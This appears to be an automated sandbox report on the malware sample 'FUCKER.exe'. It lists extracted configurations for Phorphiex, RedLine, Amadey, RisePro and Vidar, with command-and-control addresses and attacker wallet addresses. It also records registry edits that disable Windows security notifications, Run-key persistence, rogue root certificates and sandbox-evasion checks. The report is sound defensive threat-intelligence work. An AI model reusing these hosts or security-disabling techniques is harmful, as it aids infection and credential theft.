Resubmissions
09-04-2024 08:32
240409-kfg77aaf85 1009-04-2024 08:32
240409-kfglnaaf84 1009-04-2024 08:32
240409-kffz5aea2y 1009-04-2024 08:32
240409-kffpcsaf79 1011-03-2024 08:03
240311-jxm94afe6y 1010-03-2024 15:15
240310-snee9sfd3y 10Analysis
-
max time kernel
257s -
max time network
415s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
09-04-2024 08:32
Static task
static1
Behavioral task
behavioral1
Sample
FUCKER.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
FUCKER.exe
Resource
win10-20240319-en
Behavioral task
behavioral3
Sample
FUCKER.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral4
Sample
FUCKER.exe
Resource
win11-20240221-en
Errors
General
-
Target
FUCKER.exe
-
Size
10KB
-
MD5
2a94f3960c58c6e70826495f76d00b85
-
SHA1
e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
-
SHA256
2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
-
SHA512
fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
-
SSDEEP
192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K
Malware Config
Extracted
phorphiex
http://185.215.113.66/
0xAa3ea4838e8E3F6a1922c6B67E3cD6efD1ff175b
THRUoPK7oYqF7YyKZJvPYwTH35JsPZVPto
1Hw9tx4KyTq4oRoLVhPb4hjDJcLhEa4Tn6
qr89hag2967ef604ud3lw4pq8hmn69n46czwdnx3ut
XtxFdsKkRN3oVDXtN2ipcHeNi87basT2sL
LXMNcn9D8FQKzGNLjdSyR9dEM8Rsh9NzyX
rwn7tb5KQjXEjH42GgdHWHec5PPhVgqhSH
ARML6g7zynrwUHJbFJCCzMPiysUFXYBGgQ
48jYpFT6bT8MTeph7VsyzCQeDsGHqdQNc2kUkRFJPzfRHHjarBvBtudPUtParMkDzZbYBrd3yntWBQcsnVBNeeMbN9EXifg
3PL7YCa4akNYzuScqQwiSbtTP9q9E9PLreC
3FerB8kUraAVGCVCNkgv57zTBjUGjAUkU3
D9AJWrbYsidS9rAU146ifLRu1fzX9oQYSH
t1gvVWHnjbGTsoWXEyoTFojc2GqEzBgvbEn
bnb1cgttf7t5hu7ud3c436ufhcmy59qnkd09adqczd
bc1q0fusmmgycnhsd5cadsuz2hk8d4maausjfjypqg
bitcoincash:qr89hag2967ef604ud3lw4pq8hmn69n46czwdnx3ut
GAUCC7ZBSU2KJMHXOZD6AP5LOBGKNDPCDNRYP2CO2ACR63YCSUBNT5QE
Extracted
redline
cheat
91.198.77.158:4483
Extracted
amadey
4.18
http://185.172.128.3
-
install_dir
One_Dragon_Center
-
install_file
MSI.CentralServer.exe
-
strings_key
fd2f5851d3165c210396dcbe9930d294
-
url_paths
/QajE3OBS/index.php
Extracted
risepro
193.233.132.11:50500
Extracted
vidar
8.6
72f54d93118188013f2386eef7e5cc05
https://steamcommunity.com/profiles/76561199658817715
https://t.me/sa9ok
-
profile_id_v2
72f54d93118188013f2386eef7e5cc05
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Signatures
-
Detect Vidar Stealer 1 IoCs
resource yara_rule behavioral3/memory/5032-561-0x0000000000400000-0x0000000000644000-memory.dmp family_vidar_v7 -
Detect ZGRat V1 3 IoCs
resource yara_rule behavioral3/memory/6076-445-0x0000024279330000-0x000002427CC28000-memory.dmp family_zgrat_v1 behavioral3/files/0x000a0000000232af-512.dat family_zgrat_v1 behavioral3/files/0x001100000001682e-2924.dat family_zgrat_v1 -
Raccoon Stealer V2 payload 1 IoCs
resource yara_rule behavioral3/files/0x0003000000000743-666.dat family_raccoon_v2 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 2 IoCs
resource yara_rule behavioral3/files/0x0007000000023264-45.dat family_redline behavioral3/memory/1104-63-0x0000000000020000-0x000000000003E000-memory.dmp family_redline -
SectopRAT payload 2 IoCs
resource yara_rule behavioral3/files/0x0007000000023264-45.dat family_sectoprat behavioral3/memory/1104-63-0x0000000000020000-0x000000000003E000-memory.dmp family_sectoprat -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" 96513172.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" 3006430217.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" 3006430217.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" 3006430217.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" twztl.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" 96513172.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" 96513172.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" 96513172.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" 3006430217.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" 3006430217.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" 3006430217.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" twztl.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" twztl.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" twztl.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" 96513172.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" twztl.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" 96513172.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" twztl.exe -
Async RAT payload 1 IoCs
resource yara_rule behavioral3/files/0x0003000000000747-672.dat family_asyncrat -
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 5456 netsh.exe -
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation u1w0.1.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation u1w0.0.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation JJDHIDBFBF.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation FUCKER.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation ISetup3.exe -
Executes dropped EXE 34 IoCs
pid Process 1684 bd2.exe 4632 cp.exe 3444 lumma2.exe 1104 s1.exe 3844 twztl.exe 2448 ISetup3.exe 404 u1w0.0.exe 3124 u1w0.1.exe 1188 96513172.exe 5124 momsstiflersdgjboigfnbio.exe 5480 3006430217.exe 5892 3276515002.exe 6132 vmtoolsd.exe 5448 vmtoolsd.exe 5452 MSI.CentralServer.exe 5756 2595526574.exe 3956 PresentationFontCache.exe 5820 248483651.exe 4268 PresentationFontCache.exe 6104 crypted_15a94542.exe 5224 flt_shovemydiscoupyourarse.exe 1392 JJDHIDBFBF.exe 5292 2476721870.exe 3124 192706194.exe 4736 2837029563.exe 5156 test2.exe 5388 jokerpos.exe 5488 2.3.1.1.exe 5612 asyns.exe 2400 bin.exe 464 Dolzkqnsbh.exe 5092 d21cbe21e38b385a41a68c5e6dd32f4c.exe 6092 Creal.exe 2220 Creal.exe -
Loads dropped DLL 64 IoCs
pid Process 404 u1w0.0.exe 404 u1w0.0.exe 6132 vmtoolsd.exe 6132 vmtoolsd.exe 6132 vmtoolsd.exe 6132 vmtoolsd.exe 6132 vmtoolsd.exe 6132 vmtoolsd.exe 6132 vmtoolsd.exe 5448 vmtoolsd.exe 5448 vmtoolsd.exe 5448 vmtoolsd.exe 5448 vmtoolsd.exe 5448 vmtoolsd.exe 5448 vmtoolsd.exe 5448 vmtoolsd.exe 4268 PresentationFontCache.exe 4268 PresentationFontCache.exe 4268 PresentationFontCache.exe 4268 PresentationFontCache.exe 4268 PresentationFontCache.exe 4268 PresentationFontCache.exe 4268 PresentationFontCache.exe 4268 PresentationFontCache.exe 4268 PresentationFontCache.exe 4268 PresentationFontCache.exe 4268 PresentationFontCache.exe 4268 PresentationFontCache.exe 4268 PresentationFontCache.exe 4268 PresentationFontCache.exe 4268 PresentationFontCache.exe 4268 PresentationFontCache.exe 4268 PresentationFontCache.exe 4268 PresentationFontCache.exe 2220 Creal.exe 2220 Creal.exe 2220 Creal.exe 2220 Creal.exe 2220 Creal.exe 2220 Creal.exe 2220 Creal.exe 2220 Creal.exe 2220 Creal.exe 2220 Creal.exe 2220 Creal.exe 2220 Creal.exe 2220 Creal.exe 2220 Creal.exe 2220 Creal.exe 2220 Creal.exe 2220 Creal.exe 2220 Creal.exe 2220 Creal.exe 2220 Creal.exe 2220 Creal.exe 2220 Creal.exe 2220 Creal.exe 2220 Creal.exe 2220 Creal.exe 2220 Creal.exe 2220 Creal.exe 2220 Creal.exe 2220 Creal.exe 2220 Creal.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" twztl.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" twztl.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" 96513172.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" 96513172.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" 3006430217.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" twztl.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" twztl.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" 96513172.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" 96513172.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" 3006430217.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" 3006430217.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" 3006430217.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" 3006430217.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" twztl.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" twztl.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" 96513172.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" 96513172.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" 96513172.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" 3006430217.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" twztl.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" 3006430217.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Users\\Admin\\winpsdrvnas.exe" twztl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\syspplsvc.exe" 96513172.exe Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Users\\Admin\\syspplsvc.exe" 96513172.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Service = "C:\\Windows\\winakrosvsa.exe" 3006430217.exe Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Service = "C:\\Users\\Admin\\winakrosvsa.exe" 3006430217.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\winpsdrvnas.exe" twztl.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 42 IoCs
flow ioc 31 raw.githubusercontent.com 190 raw.githubusercontent.com 275 raw.githubusercontent.com 404 raw.githubusercontent.com 155 raw.githubusercontent.com 191 raw.githubusercontent.com 205 raw.githubusercontent.com 226 raw.githubusercontent.com 307 raw.githubusercontent.com 403 raw.githubusercontent.com 422 raw.githubusercontent.com 456 raw.githubusercontent.com 461 raw.githubusercontent.com 437 raw.githubusercontent.com 440 raw.githubusercontent.com 255 raw.githubusercontent.com 278 raw.githubusercontent.com 350 raw.githubusercontent.com 391 raw.githubusercontent.com 276 raw.githubusercontent.com 349 raw.githubusercontent.com 380 raw.githubusercontent.com 402 raw.githubusercontent.com 455 raw.githubusercontent.com 197 raw.githubusercontent.com 250 raw.githubusercontent.com 412 raw.githubusercontent.com 457 raw.githubusercontent.com 473 raw.githubusercontent.com 178 raw.githubusercontent.com 273 raw.githubusercontent.com 324 raw.githubusercontent.com 342 raw.githubusercontent.com 351 raw.githubusercontent.com 353 raw.githubusercontent.com 32 raw.githubusercontent.com 109 raw.githubusercontent.com 175 raw.githubusercontent.com 189 raw.githubusercontent.com 208 raw.githubusercontent.com 268 raw.githubusercontent.com 478 raw.githubusercontent.com -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 3444 set thread context of 3068 3444 lumma2.exe 107 PID 5448 set thread context of 3864 5448 vmtoolsd.exe 137 PID 6104 set thread context of 5244 6104 crypted_15a94542.exe 151 PID 3008 set thread context of 5032 3008 powershell.exe 157 PID 3864 set thread context of 5260 3864 cmd.exe 163 PID 5388 set thread context of 3476 5388 jokerpos.exe 170 -
Drops file in Windows directory 7 IoCs
description ioc Process File opened for modification C:\Windows\winpsdrvnas.exe twztl.exe File created C:\Windows\syspplsvc.exe 96513172.exe File opened for modification C:\Windows\syspplsvc.exe 96513172.exe File created C:\Windows\Tasks\MSI.CentralServer.job cp.exe File created C:\Windows\winakrosvsa.exe 3006430217.exe File opened for modification C:\Windows\winakrosvsa.exe 3006430217.exe File created C:\Windows\winpsdrvnas.exe twztl.exe -
Detects Pyinstaller 2 IoCs
resource yara_rule behavioral3/files/0x0007000000023295-461.dat pyinstaller behavioral3/files/0x00050000000163e4-2176.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 4 IoCs
pid pid_target Process procid_target 2420 2448 WerFault.exe 108 5144 404 WerFault.exe 113 5436 5032 WerFault.exe 157 4420 5508 WerFault.exe 189 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u1w0.1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u1w0.1.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u1w0.1.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString u1w0.0.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 u1w0.0.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1892 schtasks.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 2060 tasklist.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 momsstiflersdgjboigfnbio.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e momsstiflersdgjboigfnbio.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800001900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286040000000100000010000000497904b0eb8719ac47b0bc11519b74d0200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e momsstiflersdgjboigfnbio.exe Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\78E50262E8C47571FB82D5063A6C9BD91BB8A325 momsstiflersdgjboigfnbio.exe Set value (data) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\78E50262E8C47571FB82D5063A6C9BD91BB8A325\Blob = 03000000010000001400000078e50262e8c47571fb82d5063a6c9bd91bb8a325140000000100000014000000ef4c0092a6fb762e5e95e2c95f871b19d54de2d904000000010000001000000003f6e71fa4328959fc11dbda6e2594a00f0000000100000030000000effb32d2d626fdd3cedd8f30be7db5bedc8f636cb1eb2b41256bf77805094c42d35fa47f4ec6029a846c8ccb1c691438190000000100000010000000dfd7f624560e51db4e9ed98d584f0a405c0000000100000004000000000c0000180000000100000010000000ea6089055218053dd01e37e1d806eedf4b0000000100000044000000300037004300450046003200460036003500340045003300450044003600300035003000460046004300390042003600450042003800340034003200350030005f00000020000000010000004e0600003082064a30820432a003020102021100835b7615206d2d6e097e0b6e409fefc0300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3232313131363030303030305a170d3332313131353233353935395a3044310b300906035504061302555331123010060355040a1309496e7465726e6574323121301f06035504031318496e436f6d6d6f6e20525341205365727665722043412032308201a2300d06092a864886f70d01010105000382018f003082018a028201810089f05cc438bad03457af9755a0f42243fc3e18113adb6d7a52210631d6d4b7b7928886858ff899ff1885a29d2b5ae1f8042149de44af405f9a22112c3a7b9747a995892a54c79dc733902923314855b7781aa63ab60c1a3f3bbf5d123fe039b3fa1a0b5bf8bfcc3d7d897bd2f79a9f354f2a3fbff7fd449fdbf54d494366b8c2a5691830928bae7b4bac89d60aed5f16df37bead316f591d89b5628d4c89dc372583dc6855cbfec6d3d3f04c0bbb874aaa4724e41132dffb3ec55ad73c735d9ff927ef98a1ca155a8aa4d3ed80c92bc2ac1a3a038e0f8434d008a1553f94cc9e8c9a134f1a0fbf5dfd016af9972821834efe6ecd078e743df9a3f670d7a5780b8278b688f558b63b864561af3286f945898929fc1efddd5138f87649de241350ad47dc21f4c7577802b4ac179f57979abc611feb56bbd455c2c0de8111b4b36f0e31d55e3b096366f62b5234689aeb4d3b91b3ca7bde5712550a7dc26e7eda7382fee6fc0f360b34e0374e006ccd61d1b9b7aaf2c983e8b122c7d81f2a0cdcf10203010001a38201703082016c301f0603551d230418301680145379bf5aaa2b4acf5480e1d89bc09df2b20366cb301d0603551d0e04160414ef4c0092a6fb762e5e95e2c95f871b19d54de2d9300e0603551d0f0101ff04040302018630120603551d130101ff040830060101ff020100301d0603551d250416301406082b0601050507030106082b0601050507030230220603551d20041b3019300d060b2b06010401b231010202673008060667810c01020230500603551d1f044930473045a043a041863f687474703a2f2f63726c2e7573657274727573742e636f6d2f55534552547275737452534143657274696669636174696f6e417574686f726974792e63726c307106082b0601050507010104653063303a06082b06010505073002862e687474703a2f2f6372742e7573657274727573742e636f6d2f55534552547275737452534141414143412e637274302506082b060105050730018619687474703a2f2f6f6373702e7573657274727573742e636f6d300d06092a864886f70d01010c0500038202010026800d34e41eae22beaf3ea6e284f9c6b725b1f7db2fa875c26a82acc3b6ce5b82c6a906cc11632a639972de975d50d94eb0af24a57652230510d9f0087c34eb3ce40e8c28940b694f6a1f34721bac365104f3470c76b1e637d0c92cdd97487bdae3b39ac46258883a1f43c32f305132715f39987ff0351a4a78249a74c48842551d60092397e495bad7ce64c22776e366ec2e6d2f09004003fad0831bcba48b59842f544bfaf7de582d5ff7181730788c639df97b36b04014946caef20acba2162192058dea1ab2a0574ea66ae5f32bbb092195ee099541ff6f8b05410c82a6fb6ccb0e8fe7851924f3103405bd41a8fcf26cf112495878cb9ad9e5bcc1e0ba3660dd3ad4757df870e79c80c17df34889c00276fe091b219fa5b4bac6c8b7502375e72a5a1b8dcf26a4345270500ee47ad22a3502979236462191a1d0f5393fd02e00f84337316fca16e539dde1cb5655f